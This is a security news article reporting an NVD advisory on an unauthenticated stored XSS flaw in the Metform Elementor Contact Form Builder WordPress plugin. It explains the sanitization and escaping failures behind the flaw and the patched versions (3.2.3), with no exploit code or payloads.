The United States National Vulnerability Database has issued an advisory concerning an XSS vulnerability in the widely used Metform Elementor Contact Form Builder. This vulnerability affects over 200,000 active installations.
Stored Cross Site Scripting (XSS)
A stored XSS vulnerability occurs when a website fails to adequately secure an input, such as a submission form, allowing a hacker to upload a malicious script to the server.
The malicious script is then downloaded and executed by a visitor’s browser, enabling the hacker to steal cookies or gain website permissions, potentially leading to a complete website takeover.
The Open Worldwide Application Security Project (OWASP) defines Cross Site Scripting as follows:
"An attacker can use XSS to send a malicious script to an unsuspecting user.
The end user’s browser has no way to know that the script should not be trusted, and will execute the script.
Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site."
There are various kinds of XSS attacks. The vulnerability affecting the Elementor contact form plugin is a stored XSS because the malicious script is uploaded to and stored on the website servers.
What makes this vulnerability particularly concerning is that it is an unauthenticated version, which means the attacker does not need any kind of website permission to launch the attack.
This vulnerability has been assigned a threat score of 7.2 on a scale of 1 to 10, with 10 being the highest.
Cause of the Vulnerability
The vulnerability was caused by a coding issue in the plugin that failed to check for and block unwanted inputs through the contact submission form. This process is known as sanitization.
Additionally, there was a failure to secure the data output by the plugin, a process known as escaping output.
In the context of escaping data, WordPress explains:
"Escaping output is the process of securing output data by stripping out unwanted data, like malformed HTML or script tags. This process helps secure your data prior to rendering it for the end user."
Failure to sanitize inputs and escape outputs are the two main issues that led to this vulnerability.
The National Vulnerability Database warning details the issue:
"The Metform Elementor Contact Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via text areas on forms in versions up to, and including, 3.1.2 due to insufficient input sanitization and output escaping.
This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page, such as the submissions page."
Metform Elementor Plugin is Patched
The publishers of the Metform Elementor Contact Form Builder have released patches over several versions to fix the vulnerability.
Updated Versions and Fixes:
-
Version 3.2.0
- Improved: Security and sanitization
-
Version 3.2.2
- Fixed: Security permission issue for REST API endpoint
- Version 3.2.3 (patched on 03-06-2023)
- Fixed: Escaping issue in the signature field.
- Fixed: Form submission for not logged in users condition.
WordPress users of the Metform Elementor Contact Form Builder are advised to update their plugin to version 3.2.3, which fully resolves the issue.
(Featured image by Shutterstock/Asier Romero)
